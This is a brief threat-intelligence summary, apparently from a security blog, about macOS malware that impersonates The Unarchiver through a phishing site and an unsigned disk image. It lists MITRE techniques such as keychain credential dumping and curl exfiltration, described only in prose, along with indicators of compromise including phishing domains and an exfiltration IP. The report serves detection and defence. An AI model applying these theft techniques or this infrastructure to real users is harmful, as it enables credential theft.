MacOS malware masquerades as The Unarchiver to harvest user data via an unsigned disk image. The analysis finds Swift-based components that exfiltrate data to a remote URL, with Russian-language comments suggesting the malware author’s origin. #TheUnarchiver #CryptoTrade
Keypoints
- Phishing site impersonates The Unarchiver to lure users into downloading a malicious disk image.
- The disk image TheUnarchiver.dmg is unsigned, raising questions about its legitimacy.
- Initial security scoring (e.g., Hatching Triage) shows low detection rates, prompting deeper analysis.
- Malicious scripts within the artifact are designed to capture user information and exfiltrate it via a specified URL.
- The malware is written in Swift and includes indicators of data exfiltration to external infrastructure.
- Code comments in Russian suggest potential origin or familiarity of the author with Russian language.
MITRE Techniques
- [T1003] Credential Dumping – Extracts stored credentials from the system. ‘Scripts such as grab_keychain.sh are designed to extract stored credentials from the system.’
- [T1041] Data Exfiltration – Exfiltrates data to a specified URL using curl. ‘Data is exfiltrated using curl to a specified URL, indicating a method of transferring stolen information.’
- [T1059] Command and Scripting Interpreter – Uses shell scripts to perform information gathering and exfiltration. ‘Shell scripts are used to execute commands for information gathering and exfiltration.’
Indicators of Compromise
- [SHA-1] Disk image hash – 4932e7da6b21e1e37c507c42d40951ba53a83cf4
- [Domain] Phishing domains – tneunarchiver.com, cryptomac.dev
- [IP Address] Exfiltration server – 81.19.137.179
- [File Name] Artifacts – TheUnarchiver.dmg, grabber.zip
Read more: https://hunt.io/blog/macos-malware-impersonates-the-unarchiver-app-to-steal-user-data